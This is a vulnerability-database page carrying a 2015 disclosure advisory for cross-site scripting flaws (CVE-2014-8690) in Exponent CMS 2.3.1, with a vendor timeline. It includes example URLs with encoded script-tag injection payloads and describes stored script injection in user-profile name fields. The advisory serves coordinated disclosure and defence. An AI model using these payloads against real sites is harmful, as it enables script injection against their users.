Vulners
Lucene search
Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Exponent CMS 2.3.1 - Multiple XSS Vulnerabilities | 14 Feb 201500:00 | – | zdt |
 | Multiple Cross-Site Scripting Vulnerabilities in Exponent CMS | 21 Feb 201500:00 | – | cnvd |
 | CVE-2014-8690 | 19 Feb 201515:00 | – | cve |
 | CVE-2014-8690 | 19 Feb 201515:00 | – | cvelist |
 | Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities | 12 Feb 201500:00 | – | exploitpack |
 | CVE-2014-8690 | 19 Feb 201515:59 | – | nvd |
 | Exponent CMS < 2.3.1 Patch 4 Multiple XSS Vulnerabilities | 16 Feb 201500:00 | – | openvas |
 | Exponent CMS 2.3.1 Cross Site Scripting | 12 Feb 201500:00 | – | packetstorm |
 | Cross site scripting | 19 Feb 201515:59 | – | prion |
######################
# Exploit Title: Multiple Exponent CMS Cross-Site Scripting Vulnerabilies
# Discovered by-
# Mayuresh Dani ([email protected])
# Narendra Shinde ([email protected])
# Vendor Homepage: http://www.exponentcms.org/
# Software Link:
http://sourceforge.net/projects/exponentcms/files/exponent-2.3.1.zip/download
# Version: 2.3.1
# Date: 2014-10-11
# Tested on: Windows 7 / Mozilla Firefox
# Ubuntu 14.04 / Mozilla Firefox
# CVE: CVE-2014-8690
######################
# Vulnerability Disclosure Timeline:
# 2014-11-04: Discovered vulnerability
# 2014-11-04: Vendor Notification
# 2014-11-05: Vendor confirmation
# 2014-11-06: Vendor fixes Universal XSS -
http://www.exponentcms.org/news/security-patch-released-for-v2-1-4-v2-2-3-and-v2-3-0
# 2015-02-12: Public Disclosure
######################
# Description
# Exponent CMS is a free, open source, open standards modular enterprise
software framework and content management system (CMS) written in the PHP.
#
# CVE-2014-8690:
# Universal XSS - Exponent CMS builds the canonical path field from an
unsanitized URL, which can be used to execute arbitrary scripts.
# Examples:
#
http://server/news/show/title/time-for-a-heavy-harvest-new-release/src/%22%3E%3Cscript%3Ealert%287%29%3C/script%3E@random4cd201e063d5c
#
http://server/news/show/title/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Etime-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c
#
http://server/news/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Eshow/title/time-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c
#
# 2.b. XSS in user profiles.
# The "First Name" and "Last Name" fields on
http://server/exponent/users/edituser are not sufficiently sanitized. Enter
your favourite script and the application will execute it everytime for you.
#
# More information and PoCs -
http://exponentcms.lighthouseapp.com/projects/61783/tickets/1230-universal-cross-site-scripting-in-exponent-cms-231-and-prior
#
#
# Thanks,
# Mayuresh & NarendraData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Feb 2015 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 24.3
EPSS0.14775